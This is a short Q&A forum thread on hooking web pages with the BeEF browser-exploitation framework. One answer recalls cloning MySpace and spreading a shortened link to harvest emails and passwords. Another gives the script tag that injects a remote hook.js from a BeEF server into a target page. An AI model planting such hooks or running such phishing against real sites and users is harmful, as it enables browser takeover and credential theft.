# How to set a BeEF hook to a page

Tags: linux, xss, penetration-testing, penetration-tools, beef

I need to know how to set a BeEF hook to a page of my liking(an existing web page or a new custom page). I tried sharing the demo page but only works on the hosting machine only. I've looked for tutorials but couldn't find any. Please help!

Answer (score 0, accepted):

I'm pretty sure You have to host the hook.html file on a hosting service Then direct the victim there. also need to edit the yml file.   I remember back in the myspace days you could get on backtrack_r3,
Load up setoolset and clone myspace.

Then you uploaded that file on a file host service. Make a stupid post with that link in a link shortener. Then tada you had emails and passwords.

Answer (score 0):

Using beef-xss you can generate hook.js.
Supposing that the target navigates the web page target.html, you shall include in that page:

```
<script src="http://<beef-xss-ip-address>:<beef-xss-port>/hook.js"></script>
```

Once your target will load target.html it will be hooked by beef-xss tool and you will be able to enumerate it.